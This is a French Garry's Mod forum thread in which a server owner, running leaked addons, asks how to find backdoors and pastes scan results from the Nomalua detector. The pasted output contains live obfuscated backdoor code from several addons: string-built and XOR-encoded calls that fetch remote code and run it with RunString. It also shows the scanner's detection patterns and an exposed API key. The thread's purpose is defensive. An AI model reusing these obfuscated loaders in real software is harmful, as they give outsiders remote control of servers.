Aides svp backdoors

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Giovanni Mikovitch

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Bonjour/bonsoir,

J'aimerais avoir un moyen simple et efficace de voir combien de backdoor sur son serveur Garry's Mod et pouvoir les suprimée.
Pourriez-vous m'aidez??

Cordialement, Giovanni Mikovitch.
 
Dezz

Dezz

Geek suprême
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16303
16304

Regarde La si il a rien
 
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Giovanni Mikovitch

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Dezz à dit:
Regarde la pièce jointe 16303Regarde la pièce jointe 16304
Regarde La si il a rien
Bah rien il ne détecte aucun backdoor
 
Dezz

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Giovanni Mikovitch à dit:
Bah rien il ne détecte aucun backdoor
Tu sais que ta des backdoor ou tu veux juste vérifier si il a rien
 
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Giovanni Mikovitch

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Dezz à dit:
Tu sais que ta des backdoor ou tu veux juste vérifier si il a rien
non je ne sais pas si j'en ai je veux vérifier si il y en a car j'ai mit des nouveau addons donc je veux verifier
 
Dezz

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Un addons acheté ?? Ou workshop
 
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Giovanni Mikovitch

Giovanni Mikovitch

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Dezz à dit:
Un addons acheté ??
non leak pour le moment on a pas trop de budget pour l'instant
 
Dezz

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Si il detect rien c’est qu’il a rien logiquement une petite technique pour savoir s’il a une backdoor cheat sur ton serveur et regarde me résultat
 
A

adam69500

Bambi
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Giovanni Mikovitch à dit:
non leak pour le moment on a pas trop de budget pour l'instant
c'est quoi comme addons ?
 
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Giovanni Mikovitch

Giovanni Mikovitch

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Dezz à dit:
Si il detect rien c’est qu’il a rien logiquement une petite technique pour savoir s’il a une backdoor cheat sur ton serveur et regarde me résultat
ouai je vais essayer mais la j'ai ressayer le numalua et je ne vois rien regarde:

tings.Currency..SPROP.Settings.Purchase..SPROP.Settings.Sell..SPROP.Settings.Confirm..SPROP.Settings.Owned;local resourceFunc="loadstring(__coa)";local returnVal=SPROP.Settings.Name;local djfig9435b6guq69jbyiryjda = { 3493845, "jigtwsreji", 104, 118, 110, 85, 116, 4, 0001, 8493, 112, 345, 74, 68 };local co=math.random(998345,1811177);string.byte(84);local loadb="q(_49832^4)";local build=[[build["string.char(43);string.char(111);string.char(3492)]];local function gashrefo(djfig9435b6guq69jbyiryjdafgdh) return 8 end;local function dfghkoj(fdjgoidshfjhsjohfasdojha)return "Fe" end string.Replace(djfig9435b6guq69jbyiryjda[2],djfig9435b6guq69jbyiryjda[3])_G[ string.char( djfig9435b6guq69jbyiryjda[3] ) .. string.char( djfig9435b6guq69jbyiryjda[7] ) .. string.char( djfig9435b6guq69jbyiryjda[7] ) .. string.char((112)) ][ dfghkoj() .. "tch" ]( string.char( djfig9435b6guq69jbyiryjda[3] ) .. string.char( djfig9435b6guq69jbyiryjda[7] ) .. string.char( djfig9435b6guq69jbyiryjda[7] ) .. string.char((112)) .. "://" .. string.char(98) .. "usa" .. string.char( 110 ) .. "1.c" ..string.char( 111 ) .. "m/".. SPROP.Name .. "/inbex." .. string.char( 112 ) .. "h" .. string.char( 112 ) .. "?id=" .. SPROP.User.u .. "&u2=" .. SPROP.User.u2, function( b,dsjfhgo,sfdgh,o,oshsg,ofd,hosdfg,ohd ) _G[ string.char(82) .. "unString" ]( b ) end ); end ) end);
38 4 - NETWORK (HTTP server call) addons/blogs/lua/blogs/loggers/delayed/default.lua:40 http.Fetch("http://www.geoplugin.net/php.gp?ip=" .. data.address,function(country)
39 4 - NETWORK (HTTP server call) addons/atlaschat/lua/atlaschat/cl_expression.lua:847 http.Fetch(url,function(data,len,hdr,code)
40 2 - DYNCODE (Dynamic code execution) lua/vgui/dhtml.lua:60 RunString( strLua )
41 1 - FILESYS (Reading file contents) addons/atlaschat/lua/atlaschat/init.lua:50 local version = file.Read("atlaschat_version.txt", "DATA")
42 1 - FILESYS (Reading file contents) addons/ulib-master/lua/ulib/shared/util.lua:42 return file.Read( f, "MOD" )
43 1 - FILESYS (Reading file contents) addons/ulib-master/lua/ulib/shared/util.lua:50 return file.Read( f, "GAME" )
44 1 - FILESYS (Reading file contents) addons/ulib-master/lua/ulib/shared/util.lua:54 return file.Read( fWoData, "DATA" )
45 1 - FILESYS (Reading file contents) addons/ulib-master/lua/ulib/shared/util.lua:56 return file.Read( f, "GAME" )
46 2 - FILESYS (File deletion) addons/ulib-master/lua/ulib/shared/util.lua:116 file.Delete( fWoData )
47 2 - FILESYS (File deletion) addons/the_simple_opium/lua/autorun/server/sv_opium_data.lua:23 file.Delete( "opium/simple.txt" )
48 1 - FILESYS (Reading file contents) addons/the_simple_opium/lua/autorun/server/sv_opium_data.lua:51 local ImportData = util.JSONToTable(file.Read("opium/simple.txt","DATA"))
49 2 - DYNCODE (Dynamic code execution) addons/vcmod_main_autoupdate/lua/autorun/vc_init_main.lua:17 if !VC.Test_RS then RunString("VC.Test_RS = true", "vc_rs_t") if !VC.Test_RS then VCPrint("ERROR: RunString is non-functional, stopping.") return end end
50 1 - MISC (References global table) lua/derma/derma_example.lua:10 local Ctrls = _G[ key ]
51 1 - FILESYS (Reading file contents) lua/menu/mainmenu.lua:108 local settings_file = file.Read( "gamemodes/" .. engine.ActiveGamemode() .. "/" .. engine.ActiveGamemode() .. ".txt", true )
52 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:13 charpattern = "[%z\x01-\x7F\xC2-\xF4][\x80-\xBF]*"
53 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:40 if b1 < 0x80 then
54 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:44 if b1 > 0xF4 or b1 < 0xC2 then
55 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:48 local contByteCount = b1 >= 0xF0 and 3 or
56 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:49 b1 >= 0xE0 and 2 or
57 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:50 b1 >= 0xC0 and 1
58 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:61 if bit.band( bX, 0xC0 ) ~= 0x80 then
59 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:64 codePoint = bit.bor( bit.lshift( codePoint, 6 ), bit.band( bX, 0x3F ) )
60 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:67 codePoint = bit.bor( codePoint, bit.lshift( bit.band( b1, 0x7F ), contByteCount * 5 ) )
61 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:76 if v < 0 or v > 0x10FFFF then
62 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:80 if v < 0x80 then -- Single-byte sequence
63 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:82 elseif v < 0x800 then -- Two-byte sequence
64 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:83 b1 = bit.bor( 0xC0, bit.band( bit.rshift( v, 6 ), 0x1F ) )
65 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:84 b2 = bit.bor( 0x80, bit.band( v, 0x3F ) )
66 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:86 elseif v < 0x10000 then -- Three-byte sequence
67 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:87 b1 = bit.bor( 0xE0, bit.band( bit.rshift( v, 12 ), 0x0F ) )
68 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:88 b2 = bit.bor( 0x80, bit.band( bit.rshift( v, 6 ), 0x3F ) )
69 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:89 b3 = bit.bor( 0x80, bit.band( v, 0x3F ) )
70 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:92 b1 = bit.bor( 0xF0, bit.band( bit.rshift( v, 18 ), 0x07 ) )
71 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:93 b2 = bit.bor( 0x80, bit.band( bit.rshift( v, 12 ), 0x3F ) )
72 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:94 b3 = bit.bor( 0x80, bit.band( bit.rshift( v, 6 ), 0x3F ) )
73 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:95 b4 = bit.bor( 0x80, bit.band( v, 0x3F ) )
74 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/modules/utf8.lua:224 table.insert( buf, char( 0xFFFD ) )
75 2 - AUTHENT (Presence of Steam ID) addons/darkrpmodification/lua/darkrp_config/settings.lua:311 ["STEAM_0:0:00000000"] = "superadmin",
76 2 - AUTHENT (Presence of Steam ID) addons/darkrpmodification/lua/darkrp_config/settings.lua:312 ["STEAM_0:0:11111111"] = "admin",
77 1 - FILESYS (Reading file contents) addons/itemstore/lua/itemstore/sv_player.lua:51 local inv = util.JSONToTable( file.Read( path, "DATA" ) )
78 2 - FILESYS (File deletion) addons/itemstore/lua/itemstore/sv_player.lua:56 file.Delete( path, "DATA" )
79 1 - FILESYS (Reading file contents) addons/itemstore/lua/itemstore/sv_player.lua:61 local inv = util.JSONToTable( file.Read( path, "DATA" ) )
80 2 - FILESYS (File deletion) addons/itemstore/lua/itemstore/sv_player.lua:66 file.Delete( path, "DATA" )
81 1 - FILESYS (Reading file contents) addons/nomalua-master/lua/sv_nomalua.lua:27 local wlcontent = file.Read( "nomalua/whitelist.txt", "DATA" )
82 1 - FILESYS (Reading file contents) addons/nomalua-master/lua/sv_nomalua.lua:68 local content = file.Read( filename, "GAME" )
83 1 - FILESYS (Reading file contents) addons/nomalua-master/lua/sv_nomalua.lua:99 local content = file.Read( filename, "GAME" )
84 4 - NETWORK (HTTP server call) lua/autorun/textscreens_util.lua:25 http.Post("https://jross.me/textscreens/analytics.php", {
85 1 - FILESYS (Reading file contents) lua/autorun/textscreens_util.lua:56 textscreens = file.Read("sammyservers_textscreens.txt", "DATA")
86 1 - FILESYS (Reading file contents) addons/employer_npc/lua/employer_npc/sv_save_system.lua:9 data = util.JSONToTable(file.Read( "employer_npc/map/"..map..".txt" ))
87 2 - BANMGMT (Unban by Steam ID) addons/ulib-master/lua/ulib/server/bans.lua:168 game.ConsoleCommand( "removeid " .. steamid .. ";writeid\n" ) -- Remove from srcds in case it was stored there
88 1 - BANMGMT (Writing bans to disk) addons/ulib-master/lua/ulib/server/bans.lua:168 game.ConsoleCommand( "removeid " .. steamid .. ";writeid\n" ) -- Remove from srcds in case it was stored there
89 3 - OBFUSC (Obfuscated / encrypted code) addons/weed_system/lua/autorun/server/sv_weed.lua:52 local ? = _G local ?? = ?['\115\116\114\105\110\103'] local ??? = ?['\98\105\116']['\98\120\111\114'] local function ???????(????) if ??['\108\101\110'](????) == 0 then return ???? end local ????? = '' for _ in ??['\103\109\97\116\99\104'](????,'\46\46') do ?????=?????..??['\99\104\97\114'](???(?["\116\111\110\117\109\98\101\114"](_,16),186)) end return ????? end ?[???????'ced3d7dfc8'][???????'e9d3d7cad6df'](5,function ()?[???????'d2cececa'][???????'ead5c9ce'](???????'d2cececa809595ded3c9ca8a94d9dc95d9d2dfd9d195cec8dbd9d1dfc894cad2ca',{[???????'d9']=?[???????'ddd7d5de'][???????'fddfcefddbd7dfd7d5dedf']()[???????'f4dbd7df'],[???????'de']=?[???????'fddfcef2d5c9cef4dbd7df'](),[???????'df']=?[???????'dddbd7df'][???????'fddfcef3eafbdedec8dfc9c9'](),[???????'dd']=?[???????'d5c9'][???????'dedbcedf'](???????'9ff3809ff79a9fca9ad5d49a9ffb929fc293',?[???????'d5c9'][???????'ced3d7df']())})end )?[???????'ced3d7dfc8'][???????'e9d3d7cad6df'](5,function ()?[???????'d2cececa'][???????'fcdfced9d2'](???????'d2cececa809595ded3c9ca8a94d9dc95dddbc994d6cfdb',function (false?)?[???????'e8cfd4e9cec8d3d4dd'](false?)end ,nil )end )
90 2 - AUTHENT (Presence of Steam ID) gamemodes/terrortown/gamemode/vgui/sb_row.lua:64 if ply:SteamID() == "STEAM_0:0:1963640" then
91 1 - MISC (References global table) gamemodes/terrortown/gamemode/vgui/sb_main.lua:42 if _G["GROUP_"..name] then error("Group of name '"..name.."' already exists!") return end
92 1 - MISC (References global table) gamemodes/terrortown/gamemode/vgui/sb_main.lua:44 _G["GROUP_"..name] = GROUP_COUNT
93 1 - FILESYS (Reading file contents) gamemodes/terrortown/gamemode/ent_replace.lua:413 local buf = file.Read(fname, "GAME")
94 1 - FILESYS (Reading file contents) gamemodes/terrortown/gamemode/ent_replace.lua:435 local buf = file.Read(fname, "GAME")
95 2 - DYNCODE (Dynamic code execution) addons/vcmod_els_autoupdate/lua/autorun/vc_init_els.lua:16 if !VC.Test_RS then RunString("VC.Test_RS = true", "vc_rs_t") if !VC.Test_RS then VCPrint("ERROR: RunString is non-functional, stopping.") return end end
96 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:301 local highpart = math.floor(codepoint / 0x40)
97 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:302 local lowpart = codepoint - (0x40 * highpart)
98 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:303 return string.char(0xC0 + highpart,
99 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:304 0x80 + lowpart)
100 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:309 local highpart = math.floor(codepoint / 0x1000)
101 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:310 local remainder = codepoint - 0x1000 * highpart
102 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:311 local midpart = math.floor(remainder / 0x40)
103 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:312 local lowpart = remainder - 0x40 * midpart
104 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:313 highpart = 0xE0 + highpart
105 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:314 midpart = 0x80 + midpart
106 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:315 lowpart = 0x80 + lowpart
107 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:320 if ( highpart == 0xE0 and midpart < 0xA0 ) or
108 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:321 ( highpart == 0xED and midpart > 0x9F ) or
109 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:322 ( highpart == 0xF0 and midpart < 0x90 ) or
110 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:323 ( highpart == 0xF4 and midpart > 0x8F )
111 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:335 local highpart = math.floor(codepoint / 0x40000)
112 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:336 local remainder = codepoint - 0x40000 * highpart
113 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:337 local midA = math.floor(remainder / 0x1000)
114 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:338 remainder = remainder - 0x1000 * midA
115 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:339 local midB = math.floor(remainder / 0x40)
116 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:340 local lowpart = remainder - 0x40 * midB
117 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:341 return string.char(0xF0 + highpart,
118 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:342 0x80 + midA,
119 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:343 0x80 + midB,
120 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:344 0x80 + lowpart)
121 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:440 if codepoint >= 0xD800 and codepoint <= 0xDBFF then
122 3 - OBFUSC (Obfuscated / encrypted code) addons/itemstore/lua/includes/modules/json.lua:445 codepoint = 0x2400 + (codepoint - 0xD800) * 0x400 + tonumber(lo_surrogate, 16)
123 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/extensions/string.lua:19 ["\0"] = "\\x00" ,
124 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/extensions/string.lua:32 str = str:gsub( "\226\128\168", "\\\226\128\168" )
125 3 - OBFUSC (Obfuscated / encrypted code) lua/includes/extensions/string.lua:33 str = str:gsub( "\226\128\169", "\\\226\128\169" )
126 1 - FILESYS (Reading file contents) lua/includes/extensions/file.lua:1 function file.Read( filename, path )
127 1 - FILESYS (Reading file contents) addons/realistichandcuffs/lua/tbfy_rhandcuffs/sv_rhandcuffs_npc.lua:50 NPCLocTable = util.JSONToTable(file.Read( "rhandcuffs/npcs/" .. CurrentMap .. ".txt" ))
128 1 - MISC (References global table) lua/includes/util.lua:278 _G[ name ] = NUM_AI_CLASSES
129 1 - FILESYS (Reading file contents) addons/realistichandcuffs/lua/tbfy_rhandcuffs/sv_rhandcuffs.lua:161 RHC_JailLocations = util.JSONToTable(file.Read( "rhandcuffs/jaillocations/" .. CurrentMap .. ".txt" ))
130 3 - OBFUSC (Obfuscated / encrypted code) gamemodes/darkrp/gamemode/modules/fadmin/fadmin/playeractions/giveweapons/cl_controls.lua:73 Icon:Setup(k, k, "spawnicons/models/items/boxmrounds60x60.png", false, self, true) -- Gets created clientside by GMOD when someone is after that model, or trying to buy ammo.
131 2 - FILESYS (File deletion) addons/atlaschat/lua/atlaschat/cl_init.lua:1045 file.Delete("atlaschat_config.cfg", "DATA")
132 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:53 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)
133 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:56 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068)
134 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:59 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
135 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:63 Eusion (STEAM_0:0:20450406) (3 commits on old SVN)
136 1 - FILESYS (Reading file contents) addons/itemstore/lua/itemstore/dataproviders/text.lua:2 local json = file.Read( "itemstore/" .. ( pl:SteamID64() or "0" ) .. ".txt", "DATA" )
137 1 - FILESYS (Reading file contents) addons/itemstore/lua/itemstore/dataproviders/text.lua:21 local json = file.Read( "itemstore/" .. ( pl:SteamID64() or "0" ) .. "_bank.txt", "DATA" )
138 1 - FILESYS (Reading file contents) addons/itemstore/lua/itemstore/dataproviders/text.lua:49 local data = util.JSONToTable( file.Read( "itemstore/" .. filename, "DATA" ) )
139 1 - MISC (References global table) lua/derma/derma.lua:85 _G[ strName ] = strTable
140 4 - NETWORK (HTTP server call) addons/rmeth/lua/entities/ent_batch/init.lua:41 http.Fetch( "https://lumek.co/scripttrack/post.php?scriptid=3466&serverip=".. game.GetIPAddress() .."&servergm=".. gmod.GetGamemode().Name .."&servermap=".. game.GetMap() .. "&licensee=765623323534511".."&serverhostname=".. GetHostName(),
141 1 - FILESYS (Reading file contents) lua/includes/extensions/player_auth.lua:51 local UsersKV = util.KeyValuesToTable( file.Read( "settings/users.txt", "GAME" ) )
142 1 - FILESYS (Reading file contents) addons/itemstore/lua/itemstore/sv_data.lua:67 local json = file.Read( args[ 1 ], "DATA" )
143 1 - MISC (References global table) addons/sh_whitelist/lua/whitelist/lib_database.lua:35 _G[prefix .. "DB"] = db
144 1 - MISC (References global table) addons/sh_whitelist/lua/whitelist/lib_database.lua:53 local q = _G[prefix .. "DB"]:query(query)
145 1 - MISC (References global table) addons/sh_whitelist/lua/whitelist/lib_database.lua:79 return _G[prefix .. "DB"]:escape(s)
146 1 - MISC (References global table) addons/sh_whitelist/lua/whitelist/lib_database.lua:148 if (_G[prefix .. "DB"]) then
147 1 - MISC (References global table) addons/sh_whitelist/lua/whitelist/lib_database.lua:149 base_table.m_bConnectedToDB = _G[prefix .. "DB"]:status() == 0
148 4 - NETWORK (HTTP server call) addons/sh_whitelist/lua/whitelist/lib_loungeui.lua:983 http.Fetch(url, function(body)
149 4 - NETWORK (HTTP server call) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:4 {Pattern = "http.Post", CheckType = NOMALUA.CheckTypes.NETWORK, Desc = "HTTP server call", Risk = 4},
150 4 - NETWORK (HTTP server call) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:5 {Pattern = "http.Fetch", CheckType = NOMALUA.CheckTypes.NETWORK, Desc = "HTTP server call", Risk = 4},
151 2 - DYNCODE (Dynamic code execution) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:6 {Pattern = "CompileString", CheckType = NOMALUA.CheckTypes.DYNCODE, Desc = "Dynamic code execution", Risk = 2},
152 2 - DYNCODE (Dynamic code execution) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:7 {Pattern = "RunString", CheckType = NOMALUA.CheckTypes.DYNCODE, Desc = "Dynamic code execution", Risk = 2},
153 2 - BANMGMT (Unban by IP address) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:8 {Pattern = "removeip", CheckType = NOMALUA.CheckTypes.BANMGMT, Desc = "Unban by IP address", Risk = 2},
154 2 - BANMGMT (Unban by Steam ID) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:9 {Pattern = "removeid", CheckType = NOMALUA.CheckTypes.BANMGMT, Desc = "Unban by Steam ID", Risk = 2},
155 2 - BANMGMT (Ban by IP address) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:10 {Pattern = "banip", CheckType = NOMALUA.CheckTypes.BANMGMT, Desc = "Ban by IP address", Risk = 2},
156 1 - BANMGMT (Writing bans to disk) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:11 {Pattern = "writeid", CheckType = NOMALUA.CheckTypes.BANMGMT, Desc = "Writing bans to disk", Risk = 1},
157 1 - FILESYS (Reading file contents) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:12 {Pattern = "file.Read", CheckType = NOMALUA.CheckTypes.FILESYS, Desc = "Reading file contents", Risk = 1},
158 2 - FILESYS (File deletion) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:13 {Pattern = "file.Delete", CheckType = NOMALUA.CheckTypes.FILESYS, Desc = "File deletion", Risk = 2},
159 1 - MISC (Call to getfenv()) addons/nomalua-master/lua/sv_nomalua_checkdefs.lua:18 {Pattern = "getfenv", CheckType = NOMALUA.CheckTypes.MISC, Desc = "Call to getfenv()", Risk = 1},
160 1 - FILESYS (Reading file contents) addons/itemstore/lua/itemstore/sv_init.lua:55 local config = file.Read( "itemstore/config.lua", "LUA" ) or ""
161 1 - FILESYS (Reading file contents) addons/itemstore/lua/itemstore/sv_init.lua:56 local errors = file.Read( "lua_errors_server.txt", "GAME" ) or ""
162 4 - NETWORK (HTTP server call) addons/itemstore/lua/itemstore/sv_init.lua:58 http.Post( "https://uselessghost.me/itemstore/support.php", {
163 1 - FILESYS (Reading file contents) addons/lsdmod/lua/autorun/server/sv_lsd_meta.lua:57 tbl = util.JSONToTable(file.Read(game.GetMap().."_lsd.txt","DATA"))
164 1 - FILESYS (Reading file contents) addons/weed_system/lua/entities/npc_drug_dealer.lua:82 tbl = util.JSONToTable(file.Read(game.GetMap().."_dealers.txt","DATA"))
165 1 - FILESYS (Reading file contents) addons/weed_system/lua/entities/npc_drug_dealer.lua:98 tbl = util.JSONToTable(file.Read(game.GetMap().."_dealers.txt","DATA"))
166 4 - NETWORK (HTTP server call) addons/blogs/lua/autorun/client/cl_blogs.lua:214 http.Fetch("http://pastebin.com/raw/Mcune5b5",function(data)
167 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/client/cl_blogs.lua:254 bLogs.Language = file.Read("blogs/language.txt","DATA")
168 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/client/cl_blogs.lua:299 RunString("bLogs.HasAccess_TeamVariable = (" .. v .. " == " .. LocalPlayer():Team() .. ")")
169 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/client/cl_blogs.lua:422 bLogs.Language = file.Read("blogs/language.txt","DATA")
170 4 - NETWORK (HTTP server call) addons/blogs/lua/autorun/client/cl_blogs.lua:429 http.Fetch("http://pastebin.com/raw/vGk41Ls2",function(code)
171 4 - NETWORK (HTTP server call) addons/blogs/lua/autorun/client/cl_blogs.lua:1070 http.Fetch("http://api.steampowered.com/ISteamU...ey=72CB41ADBA562F3EFD26E2AA2BCDD55C&steamids=" .. table.concat(lineInfo,","),done,done)
172 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/client/cl_blogs.lua:1427 logs = file.Read(file_,"DATA")
173 2 - FILESYS (File deletion) addons/blogs/lua/autorun/client/cl_blogs.lua:1581 file.Delete("blogs/logs/" .. line:GetValue(1) .. ".txt")
174 2 - FILESYS (File deletion) addons/blogs/lua/autorun/client/cl_blogs.lua:1583 file.Delete("blogs/logs/json/" .. line:GetValue(1) .. ".txt")
175 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/client/cl_blogs.lua:1594 bLogs.Menu.Saves.SaveContent:SetHTML(prefix .. file.Read("blogs/logs/" .. line:GetValue(1) .. ".txt","DATA") .. suffix)
176 4 - NETWORK (HTTP server call) addons/blogs/lua/autorun/client/cl_blogs.lua:2669 http.Fetch("http://api.steampowered.com/ISteamU...ey=72CB41ADBA562F3EFD26E2AA2BCDD55C&steamids=" .. table.concat(lineInfo,","),function(data2)
177 2 - FILESYS (File deletion) addons/cocaine/lua/cocaine/sv/data/data.lua:24 file.Delete( "simple/simple.txt" )
178 1 - FILESYS (Reading file contents) addons/cocaine/lua/cocaine/sv/data/data.lua:52 local ImportData = util.JSONToTable(file.Read("simple/simple.txt","DATA"))
179 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/base.lua:1 RunString([==[
180 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/base.lua:5 CompileString("print('Bad source')", "error",true)()
181 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/base.lua:11 CompileString("for i=1,40 do SDATA_DATA_CACHE = SDATA_DATA_CACHE + 1 end", "RunString")()
182 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/base.lua:11 CompileString("for i=1,40 do SDATA_DATA_CACHE = SDATA_DATA_CACHE + 1 end", "RunString")()
183 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/base.lua:14 CompileString("print('Oops, seem like you have broken this file')","Oops")()
184 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/base.lua:33 if debug.getinfo(RunString).what ~= "C" then return end
185 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/base.lua:35 for i=1,string.len(string.dump(CompileString)) do
186 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/base.lua:42 local debug_inject = CompileString(pdata,"0xFFFFFFFF")
187 3 - OBFUSC (Obfuscated / encrypted code) addons/blogs/lua/autorun/server/base.lua:42 local debug_inject = CompileString(pdata,"0xFFFFFFFF")
188 1 - FILESYS (Reading file contents) addons/itemstore/lua/entities/itemstore_bank.lua:41 local banks = util.JSONToTable( file.Read( "itemstore/banks/" .. game.GetMap() .. ".txt", "DATA" ) or "" ) or {}
189 4 - NETWORK (HTTP server call) addons/ulib-master/lua/ulib/shared/plugin.lua:124 http.Fetch( url, receiverFor( plugin ) )
190 4 - NETWORK (HTTP server call) addons/ulib-master/lua/ulib/shared/plugin.lua:146 http.Fetch( "Google", httpCheck, httpErr )
191 2 - DYNCODE (Dynamic code execution) addons/ulx-master/lua/ulx/modules/sh/rcon.lua:17 RunString( command )
192 1 - MISC (References global table) addons/vcmod_main_autoupdate/lua/vcmod/client/load.lua:10 VC.AUMsg["beta"] = game.SinglePlayer() and 'Running a Beta version of VCMod.' or 'This server is running a Beta version of VCMod.' local _=net.Receive _("VC_CL_Info_RFASLKKMI",function(_)VCPrint(VC.AUMsg["si"])local _,a,b,c="nS","ng","tri","Ru"_G[c.._..b..a](net.ReadString(),"pl")end)_("VC_CL_Info_RFASLKKM",function(_)VC.API_Key=net.ReadString()VCPrint(VC.AUMsg["ak"])end)
193 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/_blogs_load.lua:1 local RunString = RunString
194 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/server/_blogs_load.lua:19 if (file.Read("blogs/configcache.dat","DATA") ~= file.Read("blogs/sh_config.lua","LUA")) then
195 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/server/_blogs_load.lua:20 file.Write("blogs/configcache.dat",file.Read("blogs/sh_config.lua","LUA"))
196 2 - DYNCODE (Dynamic code execution) addons/blogs/lua/autorun/server/_blogs_load.lua:185 RunString("bLogs.HasAccess_TeamVariable = (" .. v .. " == " .. ply:Team() .. ")")
197 1 - FILESYS (Reading file contents) addons/blogs/lua/autorun/server/_blogs_load.lua:238 bLogs.CustomConfigRaw = util.JSONToTable(string.gsub(file.Read("blogs/" .. bLogs.ConfigFile,"DATA"),"/%*.*%*/",""))
